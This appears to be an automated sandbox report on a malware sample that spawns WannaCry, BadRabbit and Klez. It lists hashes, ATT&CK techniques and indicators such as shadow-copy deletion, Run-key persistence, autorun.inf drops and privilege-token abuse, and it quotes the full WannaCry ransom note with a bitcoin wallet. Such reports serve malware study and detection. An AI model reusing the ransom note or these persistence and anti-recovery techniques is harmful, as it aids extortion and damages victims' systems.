badrabbit | 6ca11c8b6442db97c02f3b0f73db61f58c96d52e8a880e33abee5b10807d993f

Analysis

max time kernel
667s
max time network
1022s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
10-05-2024 23:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ADZP 20 Complex.exe
Size

106KB
MD5

8b6a377f9a67d5482a8eba5708f45bb2
SHA1

7197436525e568606850ee5e033c43aea1c3bc91
SHA256

6ca11c8b6442db97c02f3b0f73db61f58c96d52e8a880e33abee5b10807d993f
SHA512

644e51798399168530b05e629b414dd80cac678bd3c8d4a5d164f55736a2b2fd380d3ca4640f7a034c8f043c06b1527b473e2d17da088d5e97de6ea04120dd72
SSDEEP

3072:v7DhdC6kzWypvaQ0FxyNTBfqMXERseQF8:vBlkZvaF4NTBSAesPF8

Score

10^/10

badrabbit wannacry defense_evasion discovery execution exploit impact persistence ransomware spyware stealer worm

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94 Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

Signatures

BadRabbit
Ransomware family discovered in late 2017, mainly targeting Russia and Ukraine.
ransomware badrabbit
Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Downloads MZ/PE file

Possible privilege escalation attempt 42 IoCs

exploit

Processes:

icacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
2920	icacls.exe
14536	takeown.exe
15952	takeown.exe
20556
6812	takeown.exe
5308	takeown.exe
15832	takeown.exe
16984
18620
18268
20264
5972	takeown.exe
6184	takeown.exe
13740	takeown.exe
16784
20592
20756
13036	takeown.exe
9620
17320
8940	takeown.exe
13144	takeown.exe
7664	takeown.exe
10440	takeown.exe
12780	takeown.exe
4072	takeown.exe
17324	takeown.exe
2332	takeown.exe
3540	takeown.exe
9444	takeown.exe
17272	takeown.exe
15060	takeown.exe
5564	takeown.exe
5484	takeown.exe
2116	takeown.exe
5296	takeown.exe
12284	takeown.exe
14268	takeown.exe
12156	takeown.exe
12244	takeown.exe
17180
18240

Drops startup file 2 IoCs

Processes:

WannaCry.EXE

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDECB4.tmp	WannaCry.EXE
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDECCA.tmp	WannaCry.EXE

Executes dropped EXE 64 IoCs

Processes:

WannaCry.EXEtaskdl.exe@[email protected]@[email protected]taskhsvc.exetaskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exemain.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exeKlez.e.exeWinkueu.exeKlez.e.exeKlez.e.exeBadRabbit.exeA6F.tmpKlez.e.exe

pid	process
3564	WannaCry.EXE
3140	taskdl.exe
2492	@[email protected]
3160	@[email protected]
4716	taskhsvc.exe
4948	taskdl.exe
4784	taskse.exe
1068	@[email protected]
3872	taskdl.exe
3112	taskse.exe
1640	@[email protected]
2344	taskse.exe
2840	@[email protected]
2916	taskdl.exe
1756	taskse.exe
2212	@[email protected]
940	taskdl.exe
2772	taskse.exe
2036	@[email protected]
2192	taskdl.exe
2880	main.exe
1336	taskse.exe
1900	@[email protected]
3060	taskdl.exe
4800	taskse.exe
1204	@[email protected]
4888	taskdl.exe
4832	taskse.exe
1952	@[email protected]
3028	taskdl.exe
4900	taskse.exe
2908	@[email protected]
4640	taskdl.exe
1592	taskse.exe
784	@[email protected]
2528	taskdl.exe
2860	taskse.exe
2908	@[email protected]
2840	taskdl.exe
5104	taskse.exe
2544	@[email protected]
684	taskdl.exe
5004	taskse.exe
1892	@[email protected]
1272	taskdl.exe
3204	taskse.exe
1676	@[email protected]
1140	taskdl.exe
684	taskse.exe
3408	@[email protected]
1560	taskdl.exe
424	taskse.exe
796	@[email protected]
4700	taskdl.exe
1180	taskse.exe
752	@[email protected]
1652	taskdl.exe
3064	Klez.e.exe
1556	Winkueu.exe
3428	Klez.e.exe
3120	Klez.e.exe
4396	BadRabbit.exe
2508	A6F.tmp
4988	Klez.e.exe

Loads dropped DLL 7 IoCs

Processes:

taskhsvc.exerundll32.exe

pid process

4716 taskhsvc.exe
4716 taskhsvc.exe
4716 taskhsvc.exe
4716 taskhsvc.exe
4716 taskhsvc.exe
4716 taskhsvc.exe
2668 rundll32.exe

pid	process
4716	taskhsvc.exe
4716	taskhsvc.exe
4716	taskhsvc.exe
4716	taskhsvc.exe
4716	taskhsvc.exe
4716	taskhsvc.exe
2668	rundll32.exe

Modifies file permissions 1 TTPs 42 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

pid	process
2920	icacls.exe
2116	takeown.exe
5296	takeown.exe
12284	takeown.exe
18620
3540	takeown.exe
12244	takeown.exe
15952	takeown.exe
9444	takeown.exe
5308	takeown.exe
14268	takeown.exe
12156	takeown.exe
15832	takeown.exe
15060	takeown.exe
4072	takeown.exe
17324	takeown.exe
16984
16784
18268
20264
2332	takeown.exe
10440	takeown.exe
12780	takeown.exe
14536	takeown.exe
9620
20556
20756
6184	takeown.exe
5484	takeown.exe
13740	takeown.exe
17320
20592
5564	takeown.exe
13144	takeown.exe
18240
17272	takeown.exe
17180
5972	takeown.exe
7664	takeown.exe
6812	takeown.exe
8940	takeown.exe
13036	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\vrdysqporewuolg188 = "\"C:\\Users\\Admin\\Desktop\\tasksche.exe\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Software\Microsoft\Windows\CurrentVersion\Run\Twain_20 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Twain_20.cmd"	reg.exe

Drops desktop.ini file(s) 6 IoCs

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	attrib.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service
T1102

Processes:

flow ioc

2 camo.githubusercontent.com
32 camo.githubusercontent.com
35 raw.githubusercontent.com
42 raw.githubusercontent.com
96 raw.githubusercontent.com

flow	ioc
2	camo.githubusercontent.com
32	camo.githubusercontent.com
35	raw.githubusercontent.com
42	raw.githubusercontent.com
96	raw.githubusercontent.com

Drops autorun.inf file 1 TTPs 14 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

Processes:

attrib.execmd.exeattrib.exeattrib.execmd.exeattrib.execmd.execmd.exeattrib.execmd.execmd.execmd.execmd.exeattrib.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Desktop\Autorun.inf	attrib.exe
File opened for modification	C:\Users\Admin\Desktop\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\Desktop\Autorun.inf	attrib.exe
File opened for modification	C:\Users\Admin\Desktop\Autorun.inf	attrib.exe
File opened for modification	C:\Users\Admin\Desktop\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\Desktop\Autorun.inf	attrib.exe
File opened for modification	C:\Users\Admin\Desktop\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\Desktop\Autorun.inf	attrib.exe
File opened for modification	C:\Users\Admin\Desktop\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\Desktop\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\Desktop\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\Desktop\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\Desktop\Autorun.inf	attrib.exe

Drops file in System32 directory 19 IoCs

Processes:

Klez.e.execmd.execmd.execmd.exeWinkueu.exeKlez.e.execmd.exeKlez.e.execmd.execmd.exeKlez.e.execmd.exe

description	ioc	process
File created	C:\Windows\SysWOW64\Winkueu.exe	Klez.e.exe
File created	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File created	C:\Windows\SysWOW64\Winkueu.exe	Winkueu.exe
File created	C:\Windows\SysWOW64\Winkueu.exe	Klez.e.exe
File opened for modification	C:\Windows\SysWOW64\Winkueu.exe	Klez.e.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File created	C:\Windows\SysWOW64\Winkueu.exe	Klez.e.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\SysWOW64\Winkueu.exe	Klez.e.exe
File created	C:\Windows\SysWOW64\Winkueu.exe	Klez.e.exe
File opened for modification	C:\Windows\SysWOW64\Winkueu.exe	Winkueu.exe
File opened for modification	C:\Windows\SysWOW64\Winkueu.exe	Klez.e.exe
File created	C:\Windows\SysWOW64\Winkueu.exe:SmartScreen:$DATA	Klez.e.exe
File opened for modification	C:\Windows\SysWOW64\Winkueu.exe	Klez.e.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

WannaCry.EXE@[email protected]

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	WannaCry.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

Drops file in Windows directory 5 IoCs

Processes:

rundll32.exeBadRabbit.exe

description	ioc	process
File opened for modification	C:\Windows\A6F.tmp	rundll32.exe
File created	C:\Windows\infpub.dat	BadRabbit.exe
File opened for modification	C:\Windows\infpub.dat	rundll32.exe
File created	C:\Windows\cscc.dat	rundll32.exe
File created	C:\Windows\dispci.exe	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

3024 schtasks.exe
2604 schtasks.exe

pid	process
3024	schtasks.exe
2604	schtasks.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exemsedge.exemsedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Gathers network information 2 TTPs 41 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

Processes:

ipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exe

pid	process
8956	ipconfig.exe
9452	ipconfig.exe
10424	ipconfig.exe
13168	ipconfig.exe
14768	ipconfig.exe
15904
13084
18772
20488
5616	ipconfig.exe
12284	ipconfig.exe
11636	ipconfig.exe
15808	ipconfig.exe
20868
1016	ipconfig.exe
5708	ipconfig.exe
13308	ipconfig.exe
13032
6008	ipconfig.exe
6500	ipconfig.exe
6684	ipconfig.exe
9008	ipconfig.exe
7096	ipconfig.exe
17280	ipconfig.exe
14048
20316
16776
7680	ipconfig.exe
3616	ipconfig.exe
14260	ipconfig.exe
15080	ipconfig.exe
15912	ipconfig.exe
22072
2772	ipconfig.exe
9412	ipconfig.exe
9880	ipconfig.exe
9704
8316	ipconfig.exe
10708	ipconfig.exe
7216	ipconfig.exe
5164

Kills process with taskkill 41 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
6524	taskkill.exe
12268	taskkill.exe
13200	taskkill.exe
14296	taskkill.exe
18804
8972	taskkill.exe
10456	taskkill.exe
17352	taskkill.exe
20416
19324
1200	taskkill.exe
14300	taskkill.exe
17704
20428
13776
7708	taskkill.exe
14820	taskkill.exe
17328	taskkill.exe
14676
11532	taskkill.exe
8984	taskkill.exe
2840	taskkill.exe
6024	taskkill.exe
6076	taskkill.exe
9588	taskkill.exe
3556	taskkill.exe
13108	taskkill.exe
14364	taskkill.exe
15908	taskkill.exe
22100
8868	taskkill.exe
8596	taskkill.exe
11512	taskkill.exe
15108	taskkill.exe
15856	taskkill.exe
9520
10612
16392
7436	taskkill.exe
5792	taskkill.exe
18748

Modifies registry class 22 IoCs

Processes:

msedge.execmd.execalc.execalc.execmd.exeexplorer.execalc.exeexplorer.exeexplorer.exemsedge.execmd.exeexplorer.exeexplorer.exemsedge.exemsedge.execmd.execalc.execmd.exeexplorer.execalc.execmd.execalc.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings	calc.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings	calc.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings	calc.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1672260578-815027929-964132517-1000\{2DCBF00C-1623-4173-82A0-E298E772F01E}	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1672260578-815027929-964132517-1000\{02569505-1788-4B76-9E84-72221E043479}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings	calc.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings	calc.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings	calc.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3716 reg.exe

pid	process
3716	reg.exe

NTFS ADS 6 IoCs

Processes:

msedge.exemsedge.exemsedge.exemsedge.exemsedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\BadRabbit.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\WannaCry.EXE:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\BcatCrypto.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 487298.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Klez.e.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 902501.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 58 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exetaskhsvc.exemsedge.exemsedge.exemsedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exerundll32.exeA6F.tmp

pid	process
3752	msedge.exe
3752	msedge.exe
2068	msedge.exe
2068	msedge.exe
1696	identity_helper.exe
1696	identity_helper.exe
4948	msedge.exe
4948	msedge.exe
4856	msedge.exe
4856	msedge.exe
2920	msedge.exe
2920	msedge.exe
4716	taskhsvc.exe
4716	taskhsvc.exe
4716	taskhsvc.exe
4716	taskhsvc.exe
4716	taskhsvc.exe
4716	taskhsvc.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
3460	msedge.exe
3460	msedge.exe
2612	msedge.exe
2612	msedge.exe
2704	msedge.exe
2704	msedge.exe
3176	identity_helper.exe
3176	identity_helper.exe
3648	msedge.exe
3648	msedge.exe
3760	msedge.exe
3760	msedge.exe
2880	msedge.exe
2880	msedge.exe
2880	msedge.exe
2880	msedge.exe
4656	msedge.exe
4656	msedge.exe
5064	msedge.exe
5064	msedge.exe
3572	msedge.exe
3572	msedge.exe
440	msedge.exe
440	msedge.exe
2900	msedge.exe
2900	msedge.exe
2668	rundll32.exe
2668	rundll32.exe
2668	rundll32.exe
2668	rundll32.exe
2508	A6F.tmp
2508	A6F.tmp
2508	A6F.tmp
2508	A6F.tmp
2508	A6F.tmp
2508	A6F.tmp

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 35 IoCs

Processes:

msedge.exemsedge.exemsedge.exe

pid	process
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WMIC.exevssvc.exetaskse.exetaskse.exetaskse.exetaskse.exetaskse.exetaskse.exetaskse.exetaskse.exetaskse.exetaskse.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	1328	WMIC.exe
Token: SeSecurityPrivilege	1328	WMIC.exe
Token: SeTakeOwnershipPrivilege	1328	WMIC.exe
Token: SeLoadDriverPrivilege	1328	WMIC.exe
Token: SeSystemProfilePrivilege	1328	WMIC.exe
Token: SeSystemtimePrivilege	1328	WMIC.exe
Token: SeProfSingleProcessPrivilege	1328	WMIC.exe
Token: SeIncBasePriorityPrivilege	1328	WMIC.exe
Token: SeCreatePagefilePrivilege	1328	WMIC.exe
Token: SeBackupPrivilege	1328	WMIC.exe
Token: SeRestorePrivilege	1328	WMIC.exe
Token: SeShutdownPrivilege	1328	WMIC.exe
Token: SeDebugPrivilege	1328	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1328	WMIC.exe
Token: SeRemoteShutdownPrivilege	1328	WMIC.exe
Token: SeUndockPrivilege	1328	WMIC.exe
Token: SeManageVolumePrivilege	1328	WMIC.exe
Token: 33	1328	WMIC.exe
Token: 34	1328	WMIC.exe
Token: 35	1328	WMIC.exe
Token: 36	1328	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1328	WMIC.exe
Token: SeSecurityPrivilege	1328	WMIC.exe
Token: SeTakeOwnershipPrivilege	1328	WMIC.exe
Token: SeLoadDriverPrivilege	1328	WMIC.exe
Token: SeSystemProfilePrivilege	1328	WMIC.exe
Token: SeSystemtimePrivilege	1328	WMIC.exe
Token: SeProfSingleProcessPrivilege	1328	WMIC.exe
Token: SeIncBasePriorityPrivilege	1328	WMIC.exe
Token: SeCreatePagefilePrivilege	1328	WMIC.exe
Token: SeBackupPrivilege	1328	WMIC.exe
Token: SeRestorePrivilege	1328	WMIC.exe
Token: SeShutdownPrivilege	1328	WMIC.exe
Token: SeDebugPrivilege	1328	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1328	WMIC.exe
Token: SeRemoteShutdownPrivilege	1328	WMIC.exe
Token: SeUndockPrivilege	1328	WMIC.exe
Token: SeManageVolumePrivilege	1328	WMIC.exe
Token: 33	1328	WMIC.exe
Token: 34	1328	WMIC.exe
Token: 35	1328	WMIC.exe
Token: 36	1328	WMIC.exe
Token: SeBackupPrivilege	2908	vssvc.exe
Token: SeRestorePrivilege	2908	vssvc.exe
Token: SeAuditPrivilege	2908	vssvc.exe
Token: SeTcbPrivilege	4784	taskse.exe
Token: SeTcbPrivilege	4784	taskse.exe
Token: SeTcbPrivilege	3112	taskse.exe
Token: SeTcbPrivilege	3112	taskse.exe
Token: SeTcbPrivilege	2344	taskse.exe
Token: SeTcbPrivilege	2344	taskse.exe
Token: SeTcbPrivilege	1756	taskse.exe
Token: SeTcbPrivilege	1756	taskse.exe
Token: SeTcbPrivilege	2772	taskse.exe
Token: SeTcbPrivilege	2772	taskse.exe
Token: SeTcbPrivilege	1336	taskse.exe
Token: SeTcbPrivilege	1336	taskse.exe
Token: SeTcbPrivilege	4800	taskse.exe
Token: SeTcbPrivilege	4800	taskse.exe
Token: SeTcbPrivilege	4832	taskse.exe
Token: SeTcbPrivilege	4832	taskse.exe
Token: SeTcbPrivilege	4900	taskse.exe
Token: SeTcbPrivilege	4900	taskse.exe
Token: SeTcbPrivilege	1592	taskse.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exemsedge.exe

pid	process
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe

Suspicious use of SendNotifyMessage 40 IoCs

Processes:

msedge.exemsedge.exemsedge.exe

pid	process
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2068	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
2704	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe

Suspicious use of SetWindowsHookEx 30 IoCs

Processes:

@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]OpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exe@[email protected]OpenWith.exe

pid	process
2492	@[email protected]
2492	@[email protected]
3160	@[email protected]
3160	@[email protected]
1068	@[email protected]
1068	@[email protected]
1640	@[email protected]
2840	@[email protected]
2212	@[email protected]
2036	@[email protected]
1900	@[email protected]
1204	@[email protected]
1952	@[email protected]
2908	@[email protected]
784	@[email protected]
2908	@[email protected]
2544	@[email protected]
1892	@[email protected]
1676	@[email protected]
3408	@[email protected]
796	@[email protected]
752	@[email protected]
2632	@[email protected]
3856	OpenWith.exe
5520	OpenWith.exe
6012	OpenWith.exe
6892	OpenWith.exe
6912	OpenWith.exe
8112	@[email protected]
6156	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ADZP 20 Complex.exemsedge.exe

description	pid	process	target process
PID 2216 wrote to memory of 2532	2216	ADZP 20 Complex.exe	cmd.exe
